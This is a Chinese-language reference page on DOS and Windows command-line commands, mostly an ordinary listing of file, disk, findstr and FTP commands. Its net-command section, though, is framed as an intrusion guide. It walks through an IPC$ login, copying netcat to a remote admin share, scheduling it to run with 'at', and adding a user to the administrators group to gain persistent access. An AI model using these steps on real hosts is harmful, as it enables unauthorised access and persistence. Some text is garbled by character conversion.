DOS 線上手冊:http://www.shouce.ren/api/dos/ cmd指令:
- :http://wenku.baidu.com/view/5ecce91452d380eb62946da8.html
- :http://wenku.baidu.com/view/1a343421a5e9856a56126014.html
- :http://wenku.baidu.com/view/4a5430eaaeaad1f346933f8e.html
windows 下 cmd 指令行顯示 UTF8 字元設定 (CHCP指令):https://jingyan.baidu.com/article/f7ff0bfcee2dc22e26bb13d5.html
- chcp 65001 UTF-8
- chcp 936 預設的GBK
- chcp 437 美國英語
DOS指令
DOS 中是通過輸入英文指令加Enter鍵這種方式來執行程式的,DOS 稱為單任務的作業系統。
DOS 下的可執行檔案有三種,分别是 exe,com,bat (cmd ),都是可以直接執行的。隻需在提示符下輸入檔案基本名(不需輸入檔案字尾),然後回車即可
- 以 exe 為字尾的檔案叫可執行檔案;
- 以 com 為字尾的檔案叫指令檔案;
- 以 bat 為字尾的檔案叫批處理檔案。所謂批處理,就是一次可以執行很多條指令,當想要完成一系列任務時,可以一個一個指令的執行,也可以将這些指令都裝入一個檔案中,隻要敲一下這個檔案名,電腦就會将這一批指令一次執行完畢。
其中 EXE 和 COM 檔案都是二進制形式的,隻有 BAT檔案是文本形式的,可以直接閱讀。是以,BAT 檔案 和 二進制 可執行檔案相比,内容要簡單的多。這些檔案内包含着 DOS 指令的集合,通常 叫作 批處理檔案。批處理檔案的組成雖然比較簡單,但其用處非常大,使用也比較廣泛。比如每次都執行一些相同的指令,您一定會覺得非常麻煩,而放在批處理檔案中執行的話則輕松得多。AUTOEXEC.BAT 就是一個特殊的批處理檔案,它在 DOS 的啟動時自動運作,在系統的配置中發揮着非常大的作用。是以,要學好 DOS,就要學好批處理檔案。
在 DOS 中,有個 目前目錄 的概念,就是 提示符所顯示的目錄,假設提示符是 C:\,那麼目前工作目錄就是 C 盤的根目錄,這個 \ (反斜杠) 就表示根目錄。
DOS指令分為 内部指令 和 外部指令。( 内部指令在任何時候都可以使用,而外部指令需要保證指令檔案在目前的目錄中,或在 Autoexec.bat 檔案已經被加載了路徑。 )
- 内部指令:是随每次啟動的 COMMAND.COM 裝入并常駐記憶體。常用的内部指令有:md (建立目錄)、cd (改變目錄)、rd (删除目錄)、dir (顯示目錄内容)、path (設定路徑)、copy (檔案複制)、type (顯示檔案内容)、edit (編輯)、ren (重命名)、del (删除檔案)、cls (清屏)、ver (檢視系統版本号)、date (日期)、time (時間)、prompt (改變提示符)。
- 外部指令:是一個單獨的可執行檔案。常用的外部指令有:deltree (删除整個目錄指令)、format (磁盤格式化)、diskcopy (整盤複制)、label (建立磁盤卷标)、vol (顯示磁盤卷标)、sys (系統複制)、xcopy (目錄複制)、fc (檔案比較)、attrib (修改檔案屬性)、mem、tree (顯示目錄結構)。
部分指令說明
1.MD --- 建立子目錄
功能:建立新的子目錄
類型:内部指令
格式:MD[盤符:][路徑名]〈子目錄名〉
示例:C:\>md y /*---建立y子目錄---*/
2.CD --- 改變目前目錄
功能:顯示目前目錄
類型:内部指令
格式:CD[盤符:][路徑名][子目錄名]
說明:CD指令不能改變目前所在的盤,CD..退回到上一級目錄,CD\表示傳回到目前盤的目錄下,CD無參數時顯示目前目錄名。
示例:C:\>cd y /*---顯示目前目錄y---*/
3.RD --- 删除子目錄指令
功能:從指定的磁盤删除了目錄。
類型:内部指令
格式:RD[盤符:][路徑名][子目錄名]
示例:C:\>rd y
4.DIR --- 顯示磁盤目錄指令
功能:顯示磁盤目錄的内容。
類型:内部指令
格式:DIR [盤符][路徑][/P][/W]
示例:C:\>dir y
5.PATH --- 路徑設定指令
功能:裝置可執行檔案的搜尋路徑,隻對檔案有效。
類型:内部指令
格式:PATH[盤符1]目錄[路徑名1]{[;盤符2:],〈目錄路徑名2〉…}
C:\>path
PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\PROGRAMFILES\MTS
6.COPY --- 檔案複制指令
功能:拷貝一個或多個檔案到指定盤上。
類型:内部指令
格式:COPY [源盤][路徑]〈源檔案名〉[目标盤][路徑][目标檔案名]
C:\>copy yyy.txt yyy
1 file(s) copied
C:\yyy>dir yyy
說明: 如果是将多個檔案複制到一個新的檔案,
指令 COPY [源盤][路徑]〈源檔案A〉+[源盤][路徑]〈源檔案B〉[目标盤][路徑][目标檔案名]
C:\>copy x.txt+y.txt xy.t
7.TYPE --- 顯示檔案内容指令
功能:顯示ASCII碼檔案的内容.
類型:内部指令。
格式:TYPE[盤符:][路徑]〈檔案名〉
C:\>trpe yyy.txt /*---假設C槽目錄下存在yyy.txt檔案---*/
8.EDIT --- 編輯檔案内容指令
功能:編輯ASCII檔案的内容,也可建立一個新檔案。
類型:内部指令。
EDIT[盤符:][路徑]〈檔案名〉
說明: EDIT即可以編輯ASCII檔案的内容,也可以建立立一個檔案,
他們的擴充名命名方式也很靈活,比如.txt、.bat,甚至可以編輯.c、.bas的格式。
C:\>edit /*進入編輯模式*/
C:\>edit yyy.txt /*---編輯yyy.txt檔案的内容,如果要選擇支援中文格式,應該安裝UCDOS---*/
9.REN --- 檔案改名指令
功能:更改檔案名稱
類型:内部指令
格式:REN[盤符:][路徑]〈舊檔案名〉〈新檔案名〉
C:\>ren yyy.txt cly.txt
10.DEL --- 删除檔案指令
功能:删除指定的檔案。
類型:内部指令
格式:DEL[盤符:][路徑]〈檔案名〉[/P]
說明:選用/P參數,系統在删除前詢問是否真要删除該檔案,若不使用這個參數,則自動删除。
11.CLS --- 清螢幕指令
功能:清除螢幕上的所有顯示,光标置于螢幕左上角。
類型:内部指令
格式:CLS
C:\>CLS
12.VER --- 檢視系統版本号
功能:顯示目前系統版本号
類型:内部指令
格式:VER
C:\>VER
13.DATA --- 日期設定指令
功能:設定或顯示系統日期。
類型:内部指令
格式:DATE[mm—dd—yy]
C:\>DATE
Current date is Sun 11-23-2
Enter new date (mm-dd-yy): /*---提示你輸入新的日期---*/
14.TIME --- 系統時鐘設定指令
功能:設定或顯示系統時期。
類型:内部指令
格式:TIME[hh:mm:ss:xx]
C:\>time
Current time is 22:49:28.81
Enter new time:
15.PROMPT:更改指令提示符
功能:改變DOS系統提示符的風格。
16. deltree --- 删除目錄樹
[格式] [C:][path]DELTREE [C1:][path1] [[C2:][path2] […]]
17. mem --- 檢視你的計算機記憶體有多少,以及記憶體的使用情況。
[格式] 直接鍵入mem指令
18. chkdsk --- 檢查你的磁盤的使用情況。
[格式] chkdsk 磁盤名
21. FORMAT(Format.COM)--格式化指令
格式為"FORMAT [盤符] [參數]",例如:"FORMAT A: /S"。它有兩個常見的參數:
/Q:進行快速格式化;
/S:完成格式化,并将系統引導檔案拷貝到該磁盤。
22. FDISK(Fdisk.EXE)--分區指令
windows 運作指令全集
有關某個指令的詳細資訊,請鍵入 HELP 指令名
ASSOC 顯示或修改檔案擴充名關聯。
ATTRIB 顯示或更改檔案屬性。
BREAK 設定或清除擴充式 CTRL+C 檢查。
BCDEDIT 設定啟動資料庫中的屬性以控制啟動加載。
CACLS 顯示或修改檔案的通路控制清單(ACL)。
CALL 從另一個批處理程式調用這一個。
CD 顯示目前目錄的名稱或将其更改。
CHCP 顯示或設定活動代碼頁數。
CHDIR 顯示目前目錄的名稱或将其更改。
CHKDSK 檢查磁盤并顯示狀态報告。
CHKNTFS 顯示或修改啟動時間磁盤檢查。
CLS 清除螢幕。
CMD 打開cmd視窗
COLOR 設定預設控制台前景和背景顔色。
COMP 比較兩個或兩套檔案的内容。
COMPACT 顯示或更改 NTFS 分區上檔案的壓縮。
CONVERT 将 FAT 卷轉換成 NTFS。你不能轉換目前驅動器。
COPY 将至少一個檔案複制到另一個位置。
DATE 顯示或設定日期。
DEL 删除至少一個檔案。
DIR 顯示一個目錄中的檔案和子目錄。
DISKPART 顯示或配置磁盤分區屬性。
DOSKEY 編輯指令行、撤回 Windows 指令并建立宏。
DRIVERQUERY 顯示目前裝置驅動程式狀态和屬性。
ECHO 顯示消息,或将指令回顯打開或關閉。
ENDLOCAL 結束批檔案中環境更改的本地化。
ERASE 删除一個或多個檔案。
EXIT 退出 CMD.EXE 程式(指令解釋程式)。
FC 比較兩個檔案或兩個檔案集并顯示它們之間的不同。
FIND 在一個或多個檔案中搜尋一個文本字元串。
FINDSTR 在多個檔案中搜尋字元串。
FOR 為一組檔案中的每個檔案運作一個指定的指令。
FORMAT 格式化磁盤,以便用于 Windows。
FSUTIL 顯示或配置檔案系統屬性。
FTYPE 顯示或修改在檔案擴充名關聯中使用的檔案類型。
GOTO 将 Windows 指令解釋程式定向到批處理程式中某個帶标簽的行。
GPRESULT 顯示計算機或使用者的組政策資訊。
GRAFTABL 使 Windows 在圖形模式下顯示擴充字元集。
HELP 提供 Windows 指令的幫助資訊。
ICACLS 顯示、修改、備份或還原檔案和目錄的 ACL。
IF 在批處理程式中執行有條件的處理操作。
LABEL 建立、更改或删除磁盤的卷标。
MD 建立一個目錄。
MKDIR 建立一個目錄。
MKLINK 建立符号連結和硬連結
MODE 配置系統裝置。
MORE 逐屏顯示輸出。
MOVE 将一個或多個檔案從一個目錄移動到另一個目錄。
OPENFILES 顯示遠端使用者為了檔案共享而打開的檔案。
PATH 為可執行檔案顯示或設定搜尋路徑。
PAUSE 暫停批處理檔案的處理并顯示消息。
POPD 還原通過 PUSHD 儲存的目前目錄的上一個值。
PRINT 列印一個文本檔案。
PROMPT 更改 Windows 指令提示。
PUSHD 儲存目前目錄,然後對其進行更改。
RD 删除目錄。
RECOVER 從損壞的或有缺陷的磁盤中恢複可讀資訊。
REM 記錄批處理檔案或 CONFIG.SYS 中的注釋(批注)。
REN 重命名檔案。
RENAME 重命名檔案。
REPLACE 替換檔案。
RMDIR 删除目錄。
ROBOCOPY 複制檔案和目錄樹的進階實用工具
SET 顯示、設定或删除 Windows 環境變量。
SETLOCAL 開始本地化批處理檔案中的環境更改。
SC 顯示或配置服務(背景程序)。
SCHTASKS 安排在一台計算機上運作指令和程式。
SHIFT 調整批處理檔案中可替換參數的位置。
SHUTDOWN 允許通過本地或遠端方式正确關閉計算機。
SORT 對輸入排序。
START 啟動單獨的視窗以運作指定的程式或指令。
SUBST 将路徑與驅動器号關聯。
SYSTEMINFO 顯示計算機的特定屬性和配置。
TASKLIST 顯示包括服務在内的所有目前運作的任務。
TASKKILL 中止或停止正在運作的程序或應用程式。
TIME 顯示或設定系統時間。
TITLE 設定 CMD.EXE 會話的視窗标題。
TREE 以圖形方式顯示驅動程式或路徑的目錄結構。
TYPE 顯示文本檔案的内容。
VER 顯示 Windows 的版本。
winver 顯示 Windows 的版本。
VERIFY 告訴 Windows 是否進行驗證,以確定檔案正确寫入磁盤。
VOL 顯示磁盤卷标和序列号。
XCOPY 複制檔案和目錄樹。
WMIC 在互動式指令 shell 中顯示 WMI 資訊。
dxdiag 檢查DirectX資訊
mem.exe 顯示記憶體使用情況
Sndvol32 音量控制程式
sfc.exe 系統檔案檢查器
gpedit.msc 組政策
regedit.exe 系統資料庫
Msconfig.exe 系統配置實用程式
chkdsk.exe Chkdsk磁盤檢查
services.msc 服務
lusrmgr.msc 本地賬戶管理
drwtsn32 系統醫生
cleanmgr 垃圾整理
iexpress 木馬捆綁工具,系統自帶
mmc 控制台
dcpromo 活動目錄安裝
ntbackup 系統備份和還原
rononce -p 15秒關機
taskmgr 任務管理器
conf 啟動 netmeeting
devmgmt.msc 裝置管理器
diskmgmt.msc NT的磁盤管理器
compmgmt.msc 計算機管理
winchat 區域網路聊天
dvdplay DVD播放器
mplayer2 簡易widnows media player
mspaint 畫圖闆
wupdmgr WIDNOWS UPDATE
Clipbrd 剪貼闆檢視器
Odbcad32 ODBC資料源管理器
Nslookup IP位址偵測器
目錄操作
cd
deltree
dir
md、mkdir
path
rd
tree
檔案操作
attrib
call
copy
debug
del
edit
expand
fc
findstr
more
ren
replace
restore
sfc
shift
type
undelete
xcopy
功能操作
break
chcp
cls
ctty
date
doskey
dosshell
echo
exit
fasthelp
fastopen
find
for
forcedos
goto
graphics
help
logoff
mem
move
msav
msd
pause
power
prompt
qbasic
set
setver
shutdown
sort
sys
taskkill
tasklist
time
tsshutdn
ver
vol
vsafe
磁盤操作
chkdsk
chkntfs
convert
dblspace
defrag
diskcomp
diskcopy
diskperf
drvspace
fdisk
format
hostname
interlnk
intersrv
keyb
label
lh
loadfix
memmaker
msbackup
mscdex
scandisk
share
smartdrv
subst
unformat
verify
網絡操作
arp
finger
ftp
ipconfig
nbstat
net
netsh
netstat
nslookup
pathping
ping
rcp
rexec
route
rsh
telnet
tftp
tracert
其它
iisreset
ping6
tracert6
DOS 中 find 和 findstr 指令
參考:http://www.jb51.net/article/29239.htm
dos 中的 find 指令
find 幫助。C:\>find /?
C:\>find /?
在檔案中搜尋字元串。
FIND [/V] [/C] [/N] [/I] [/OFF[LINE]] "string" [[drive:][path]filename[ ...]]
/V 顯示所有未包含指定字元串的行。
/C 僅顯示包含字元串的行數。
/N 顯示行号。
/I 搜尋字元串時忽略大小寫。
/OFF[LINE] 不要跳過具有脫機屬性集的檔案。
"string" 指定要搜尋的文本字元串。
[drive:][path]filename 指定要搜尋的檔案。
如果沒有指定路徑,FIND 将搜尋在提示符處鍵入的文本或者由另一指令産生的文本。
find 使用示例:
find "abc" d:\abc.txt // 在abc.txt中搜尋包含字元串abc的行
find /i "abc" d:\abc.txt // 搜尋時忽略大小寫
find /n "abc" d:\abc.txt // 顯示行号
find /c "abc" d:\abc.txt // /c是英文單詞 count(計數)的縮寫。統計行數
find /v "abc" d:\abc.txt // 顯示 不包含 abc 的行。
dos 中的 findstr 指令
findstr 是 find 的擴充,功能更強大。findstr,全英文 find string,意為 "查找字元串"
findstr [/B] [/E] [/L] [/R] [/S] [/I] [/X] [/V] [/N] [/M] [/O] [/P] [/F:file]
[/C:string] [/G:file] [/D:dir list] [/A:color attributes] [/OFF[LINE]]
strings [[drive:][path]filename[ ...]]
/B 在一行的開始配對模式。
/E 在一行的結尾配對模式。
/L 按字使用搜尋字元串。
/R 使用正則搜尋
/S 在目前目錄和所有子目錄中搜尋比對檔案。
/I 搜尋時忽略大小寫。
/X 列印完全比對的行。
/V 隻列印不包含比對的行。
/N 在比對的每行前列印行數。
/M 如果檔案含有比對項,隻列印其檔案名。
/O 在每個比對行前列印字元偏移量。
/P 忽略有不可列印字元的檔案。
/OFF[LINE] 不跳過帶有脫機屬性集的檔案。
/A:attr 指定有十六進位數字的顔色屬性。請見 "color /?"
/F:file 從指定檔案讀檔案清單 (/ 代表控制台)。
/C:string 使用指定字元串作為文字搜尋字元串。
/G:file 從指定的檔案獲得搜尋字元串。 (/ 代表控制台)。
/D:dir 查找以分号為分隔符的目錄清單
strings 要查找的文字。
[drive:][path]filename 指定要查找的檔案。
除非參數有 /C 字首,請使用空格隔開搜尋字元串。
示例:
指令:findstr "hello there" x.y // 在檔案 x.y 中尋找 "hello" 或 "there"
指令:findstr /C:"hello there" x.y // 檔案 x.y 尋找 "hello there"
一般表達式的快速參考:
. 通配符: 任何字元
* 重複: 以前字元或類出現零或零以上次數
^ 行位置: 行的開始
$ 行位置: 行的終點
[class] 字元類: 任何在字元集中的字元
[^class] 補字元類: 任何不在字元集中的字元
[x-y] 範圍: 在指定範圍内的任何字元
\x Escape: 元字元 x 的文字用法
\<xyz 字位置: 字的開始
xyz\> 字位置: 字的結束
示例,精确比對 hello,即隻比對 hello 這個單詞:\<hello\>
測試文本 a.txt 的内容(a.txt 的内容在後面會多次修改):
Hello World
Hello Boy
hello ,good man.
goodbye!
findstr 使用示例:
findstr "hello" a.txt
findstr "Hello" a.txt
findstr預設是區分大小寫的(跟find指令一樣)用/i參數可以忽略大小寫。
findstr /i "Hello" a.txt //忽略大小寫
findstr /n /i "hello" a.txt //查找在那一行
find /n "hello" a.txt
findstr /m /i "hello" *.txt //加上/m參數,隻列出包含指定字元的檔案名。
findstr /b /i "hello" a.txt //查找以hello(忽略大小寫)開始的行
findstr /i "^hello" a.txt
findstr /i "hello$" a.txt
findstr /n /i "^hello$" a.txt
findstr /n /i /x "hello" a.txt // /x參數用來查找完全比對的行。
// /l參數後,findstr轉換為“普通字元串模式”(其實find就是這種模式、且隻有這種模式)。不能再使用正規表達式。
findstr /li "hello" a.txt
find 比 findstr 更強的地方:
- 1、統計含指定字元串的總行數。find /c "abc" test.txt 可以統計 test.txt 中含有字元串 abc 的總行數,而 findstr 則沒有直接提供該功能,需要配合for語句才能實作;
- 2、find 可以讀取 Unicode 格式的文本,而 findstr 則不行;
- 3、find 可以過濾某些特殊字元,而 findstr 則不行,比如,我們在使用 fsutil fsinfo drives 語句查詢磁盤分區的時候,如果想讓盤符分行顯示而不是顯示在同一行上的時候(這在用 for 語句提取盤符的時候很有用),find 可以大顯身手,而 findstr 隻能幹瞪眼了,具體語句為: 代碼: fsutil fsinfo drives|find /v ""
必知的 10 個 DOS 指令集合
ping
檢查網絡是否通暢或者網絡連接配接速度的指令。ping指令是第一個必須掌握的DOS指令,原理:網絡上的機器都有唯一确定的IP位址,我們給目标IP位址發送一個資料包,對方就要傳回一個同樣大小的資料包,根據傳回的資料包我們可以确定目标主機的存在,可以初步判斷目标主機的作業系統等。下面就來看看它的一些常用的操作。先看看幫助吧,在DOS視窗中鍵入:ping /? 回車,出現如圖1所示的幫助畫面。在此,我們隻掌握一些基本的很有用的參數就可以了(下同)。
nbtstat
該指令使用 TCP/IP 上的 NetBIOS 顯示協定統計和目前 TCP/IP 連接配接,使用這個指令你可以得到遠端主機的 NETBIOS 資訊,比如 使用者名、所屬的工作組、網卡的 MAC 位址等
netstat
檢視網絡狀态的指令,操作簡便功能強大。
Windows 中結束占用某個端口的程序( 假設 8080 端口被占用,現在結束使用8080端口的程序 ):
- 1. 在 cmd 中執行指令:netstat -ano | findstr 8080,根據端口号查找對應的PID。發現 8080 端口被 PID(程序号)為 2188 的程序占用。
- 2. 根據 PID 找程序名稱,輸入指令:tasklist | findstr 2188,發現是占用 8080 端口的程序為:javaw.exe。
- 3. 根據 PID 結束對應程序。指令 taskkill -PID 2188 -F,強制關閉 PID 為 2188 的程序。
tracert
跟蹤路由資訊,使用此指令可以查出資料從本地機器傳輸到目标主機所經過的所有途徑,這對我們了解網絡布局和結構很有幫助。如圖5,這裡說明資料從本地機器傳輸到192.168.0.1的機器上,中間沒有經過任何中轉,說明這兩台機器是在同一段區域網路内。用法:tracert IP。
net
net 指令是網絡指令中最重要的一個,必須透徹掌握它的每一個子指令的用法,因為它的功能實在是太強大了,這簡直就是微軟提供的最好的入侵工具。
NET 指令是一個由衆多指令作為參數組成的龐大指令集,其文法是:
所有 net 指令接受選項 / yes 和 /no(可縮寫為 / y 和 /n )。
- / y 對指令産生的任何互動提示自動回答 “是”。
- /n 回答 “否”。
例如,net stop server 通常提示确認是否根據伺服器服務結束所有服務,net stop server /y 自動回答“是”并關閉伺服器服務。
net view
使用此指令檢視遠端主機的是以共享資源。指令格式為 net view \\IP
NET VIEW 指令 用于顯示一個計算機上共享資源的清單。當不帶選項使用本指令時,它就會顯示目前域或工作組中計算機的清單。其指令格式如下:
net use
把遠端主機的某個共享資源影射為本地盤符,圖形界面友善使用。指令格式為 net use x: \\IP\sharename。
上面一個表示把 192.168.0.5 IP的共享名為 magic 的目錄影射為本地的 Z 盤。
下面表示和 192.168.0.7 建立 IPC$ 連接配接( net use \\IP\IPC$ "password" /user:"name" ),建立了 IPC$ 連接配接後,就可以上傳檔案了:copy nc.exe \\192.168.0.7\admin$,表示把本地目錄下的nc.exe 傳到遠端主機,結合後面要介紹到的其他DOS指令就可以實作入侵了。
net share
net share 用于管理共享資源,使網絡使用者可以使用某一伺服器上的資源。當不帶選項使用此指令時,它會列出該計算機上正在被共享的所有資源。對于每一種資源,Windows 都會報告其裝置名或路徑名,以及與之相關的描述性注釋。
參數 和 使用示例:
參數
ShareName 指定共享資源的網絡名稱。
鍵入帶參數 ShareName 的 net share 指令僅顯示有關該共享的資訊。
drive:path 指定要共享目錄的絕對路徑。
/users:number 設定可以同時通路共享資源的最多使用者數。
/unlimited 指定可以同時通路共享資源的、數量不受限制的使用者。
/remark:"text" 添加關于資源的描述注釋。給文本加上引号。
/cache:automatic 啟用帶自動重新內建的脫機客戶緩存。
/cache:manual 啟用帶手動重新內建的脫機客戶緩存。
/cache:no 提醒客戶脫機緩存不合适。
/delete 停止共享資源。
net help command 顯示指定 net 指令的幫助。
注釋
要共享帶有包含空格字元路徑的目錄,請使用引号将目錄的驅動器和路徑引起來。
例如, "C:\Path Name"
當顯示計算機上的所有共享資源時,将顯示資源的共享名、與資源相關的裝置名或路徑,
以及與資源有關的描述性注釋。輸出内容與以下相似:share name resource remark
===================================================================
ADMIN$ C:\WINNT Remote Admin
C$ C:\ Default Share for Internal Use
print$ C:\WINNT\SYSTEM\SPOOL
IPC$ Remote IPC
LASER LPT1 Spooled Laser printer
在伺服器上建立共享時,這些共享将被儲存。在停止 Server 服務時,所有共享都斷開,
但是在下一次啟動 Server 服務或者重新啟動計算機時将自動重新連接配接它們。
有關服務的詳細資訊,請參閱服務。
當從遠端計算機浏覽本地計算機時,将不顯示以字元 $ 結尾的共享資源名。
示例:
顯示有關計算機上共享資源的資訊。
指令:net share
使用共享名 DataShare 共享計算機的 C:\Data 目錄并包括注釋,
指令:net share DataShare=c:\Data /remark:"For department 123."
停止 DataShare 檔案夾共享,指令:net share DataShare /delete
使用共享名 List 共享計算機的 C:\Art Lst 目錄,指令:net share list="c:\art lst"
測試執行個體
172.100.100.100 上添加共享名 app,設定使用者名administrator,密碼是password
D:\config>net share app$=d:\config
172.200.200.200 機器執行copy指令:
// 執行連接配接
D:\>net use \\172.100.100.100\app$ "passwprd" /user:"administrator"
// 執行 copy 檔案
D:\>copy \\172.100.100.100\app$\php.ini d:\copy
D:\>copy nc.exe \\172.100.100.100\app$
// 建立 定時 任務,執行 nc.exe
D:\>at \\172.100.100.100 13:15 d:\config\nc.exe
使用 net view,net use,net share 這三個指令可以完成大部分 windows 網絡共享相關的工作,
- 用 net view 指令在網絡上查找共享資源,
- 用 net use 指令使用指定的共享資源并用
- 用 net share 指令向網絡添加共享資源。
net start / stop
啟動/停止 本地主機或者遠端主機上的服務。當你和遠端主機建立連接配接後,如果發現它的什麼服務沒有啟動,而你又想利用此服務怎麼辦? 就使用這個指令來啟動吧。
用法:net start servername
net user、net localgroup
檢視和帳戶有關的情況,包括建立帳戶、删除帳戶、檢視特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的,最重要的,它為我們克隆帳戶提供了前提。鍵入不帶參數的net user,可以檢視所有使用者,包括已經禁用的。下面分别講解。
net user abcd 1234 /add // 建立使用者名為abcd,密碼為1234的帳戶,預設為user組成員。
net user abcd /del // 将使用者名為abcd的使用者删除。
net user abcd // 檢視使用者名為abcd的使用者的情況。
net user abcd /active:no // 将使用者名為abcd的使用者禁用。
net user abcd /active:yes // 激活使用者名為abcd的使用者。
net localgroup // 檢視所有和使用者組有關的資訊和進行相關操作。
不帶參數的 net localgroup 即列出目前所有的使用者組。
在入侵過程中,一般利用它來把某個帳戶提升為 administrator 組帳戶。
指令:net localgroup groupname username /add
把使用者 abcd 加到 administrator 組裡去了,這時候 abcd 使用者已經是超級管理者了。可以使用 net user abcd 來檢視他的狀态。但這樣太明顯了,網管一看使用者情況就能漏出破綻,是以這種方法隻能對付菜鳥網管,但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理者,這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。
net time
檢視遠端主機目前的時間。如果你的目标隻是進入到遠端主機裡面,那麼也許就用不到這個指令了。但簡單的入侵成功了,難道隻是看看嗎?我們需要進一步滲透。這就連遠端主機目前的時間都需要知道,因為利用時間和其他手段(後面會講到)可以實作某個指令和程式的定時啟動,為我們進一步入侵打好基礎。用法:net time \\IP。
at
這個指令的作用是安排在特定日期或時間執行某個特定的指令和程式(知道net time的重要了吧?)。
當我們知道了遠端主機的目前時間,就可以利用此指令讓其在以後的某個時間(比如2分鐘後)執行某個程式和指令。
用法:at time command \\computer。如圖:表示在6點55分時,讓名稱為a-01的計算機開啟telnet服務(這裡net start telnet即為開啟telnet服務的指令)。
ftp
FTP 指令詳解:
FTP 指令是 Internet 使用者使用最頻繁的指令之一
熟悉并靈活應用FTP的内部指令,可以大大友善使用者,并收到事半功倍之效。
如果你想學習使用進行背景FTP下載下傳,那麼就必須學習FTP指令。
FTP 的指令行格式為:
ftp -v -d -i -n -g [主機名] ,其中
-v 顯示遠端伺服器的所有響應資訊
-n 限制ftp的自動登入,即不使用;.n etrc檔案;
-d 使用調試方式;
-g 取消全局檔案名。
FTP使用的内部指令如下(中括号表示可選項):
1.![cmd[args]]:在本地機中執行互動shell,exit回到ftp環境,如:!ls*.zip
2.$ macro-ame[args]: 執行宏定義macro-name。
3.account[password]: 提供登入遠端系統成功後通路系統資源所需的補充密碼。
4.append local-file[remote-file]:将本地檔案追加到遠端系統主機,
若未指定遠端系統檔案名,則使用本地檔案名。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個指令執行完畢後計算機響鈴一次。
7.bin:使用二進制檔案傳輸方式。
8.bye:退出ftp會話過程。
9.case:在使用mget時,将遠端主機檔案名中的大寫轉為小寫字母。
10.cd remote-dir:進入遠端主機目錄。
11.cdup:進入遠端主機目錄的父目錄。
12.chmod mode file-name:将遠端主機檔案file-name的存取方式設定為mode,如:chmod 777 a.out。
13.close:中斷與遠端伺服器的ftp會話(與open對應)。
14.cr:使用asscii方式傳輸檔案時,将回車換行轉換為回行。
15.delete remote-file:删除遠端主機檔案。
16.debug[debug-value]:設定調試方式, 顯示發送至遠端主機的每條指令,
如:deb up 3,若設為0,表示取消debug。
17.dir[remote-dir][local-file]:顯示遠端主機目錄,并将結果存入本地檔案。
18.disconnection:同close。
19.form format:将檔案傳輸方式設定為format,預設為file方式。
20.get remote-file[local-file]: 将遠端主機的檔案remote-file傳至本地硬碟的local-file。
21.glob:設定mdelete,mget,mput的檔案名擴充,預設時不擴充檔案名,同指令行的-g參數。
22.hash:每傳輸1024位元組,顯示一個hash符号(#)。
23.help[cmd]:顯示ftp内部指令cmd的幫助資訊,如:help get。
24.idle[seconds]:将遠端伺服器的休眠計時器設為[seconds]秒。
25.image:設定二進制傳輸方式(同binary)。
26.lcd[dir]:将本地工作目錄切換至dir。
27.ls[remote-dir][local-file]:顯示遠端目錄remote-dir, 并存入本地檔案local-file。
28.macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。
29.mdelete[remote-file]:删除遠端主機檔案。
30.mdir remote-files local-file:與dir類似,但可指定多個遠端檔案,
如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:傳輸多個遠端檔案。
32.mkdir dir-name:在遠端主機中建一目錄。
33.mls remote-file local-file:同nlist,但可指定多個檔案名。
34.mode[modename]:将檔案傳輸方式設定為modename, 預設為stream方式。
35.modtime file-name:顯示遠端主機檔案的最後修改時間。
36.mput local-file:将多個檔案傳輸至遠端主機。
37.newer file-name: 如果遠端機中file-name的修改時間比本地硬碟同名檔案的時間更近,
則重傳該檔案。
38.nlist[remote-dir][local-file]:顯示遠端主機目錄的檔案清單,并存入本地硬碟的local-file。
39.nmap[inpattern outpattern]:設定檔案名映射機制, 使檔案傳輸時,檔案中的某些字元互相轉換,
如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸檔案a1.a2.a3時,檔案名變為a1,a2。
該指令特别适用于遠端主機為非UNIX機的情況。
40.ntrans[inchars[outchars]]:設定檔案名字元的翻譯機制,如ntrans1R,則檔案名LLL将變為RRR。
41.open host[port]:建立指定ftp伺服器連接配接,可指定連接配接端口。
42.passive:進入被動傳輸方式。
43.prompt:設定多個檔案傳輸時的互動提示。
44.proxy ftp-cmd:在次要控制連接配接中,執行一條ftp指令, 該指令允許連接配接兩個ftp伺服器,
以在兩個伺服器間傳輸檔案。第一條ftp指令必須為open,以首先建立兩個伺服器間的連接配接。
45.put local-file[remote-file]:将本地檔案local-file傳送至遠端主機。
46.pwd:顯示遠端主機的目前工作目錄。
47.quit:同bye,退出ftp會話。
48.quote arg1,arg2...:将參數逐字發至遠端ftp伺服器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:類似于get, 但若local-file存在,則從上次傳輸中斷處續傳。
51.rhelp[cmd-name]:請求獲得遠端主機的幫助。
52.rstatus[file-name]:若未指定檔案名,則顯示遠端主機的狀态, 否則顯示檔案狀态。
53.rename[from][to]:更改遠端主機檔案名。
54.reset:清除回答隊列。
55.restart marker:從指定的标志marker處,重新開始get或put,如:restart 130。
56.rmdir dir-name:删除遠端主機目錄。
57.runique:設定檔案名隻一性存儲,若檔案存在,則在原檔案後加字尾.1, .2等。
58.send local-file[remote-file]:同put。
59.sendport:設定PORT指令的使用。
60.site arg1,arg2...:将參數作為SITE指令逐字發送至遠端ftp主機。
61.size file-name:顯示遠端主機檔案大小,如:site idle 7200。
62.status:顯示目前ftp狀态。
63.struct[struct-name]:将檔案傳輸結構設定為struct-name, 預設時使用stream結構。
64.sunique:将遠端主機檔案名存儲設定為隻一(與runique對應)。
65.system:顯示遠端主機的作業系統類型。
66.tenex:将檔案傳輸類型設定為TENEX機的所需的類型。
67.tick:設定傳輸時的位元組計數器。
68.trace:設定包跟蹤。
69.type[type-name]:設定檔案傳輸類型為type-name,預設為ascii,
如:type binary,設定二進制傳輸方式。
70.umask[newmask]:将遠端伺服器的預設umask設定為newmask,如:umask 3
71.user user-name[password][account]:向遠端主機表明自己的身份,需要密碼時,必須輸入密碼,
如:user anonymous my@email。
72.verbose:同 -v 參數,即設定詳盡報告方式,ftp 伺服器的所有響應都将顯示給使用者,預設為on.
73.?[cmd]: 同 help.
telent
:https://www.baidu.com/s?wd=telnet%20%E8%AF%A6%E8%A7%A3
tasklist
